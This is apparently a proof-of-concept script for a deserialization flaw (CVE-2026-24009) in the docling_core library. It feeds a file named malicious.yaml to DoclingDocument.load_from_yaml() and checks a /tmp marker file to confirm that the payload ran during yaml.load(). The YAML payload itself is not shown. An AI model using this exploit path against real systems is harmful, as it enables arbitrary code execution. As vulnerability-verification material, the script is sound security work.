README.md
README.md not found for CVE-2026-24009. The file may not exist in the repository.
from pathlib import Path
import os
from docling_core.types.doc import DoclingDocument
yaml_path = Path("malicious.yaml")
marker = Path("/tmp/docling_cve_poc_marker")
if marker.exists():
marker.unlink()
print(f"[+] Loading YAML via DoclingDocument.load_from_yaml(): {yaml_path}")
try:
DoclingDocument.load_from_yaml(yaml_path)
print("[!] load_from_yaml returned without error")
except Exception as e:
# This is expected: payload executes during yaml.load(),
# then DoclingDocument.model_validate(...) fails because the parsed object
# is not a valid DoclingDocument dictionary.
print(f"[+] load_from_yaml raised (expected for this PoC): {type(e).__name__}")
print(f" {str(e).splitlines()[0]}")
print(f"[+] Marker exists? {marker.exists()}")
if marker.exists():
print(f"[+] Marker content: {marker.read_text().strip()}")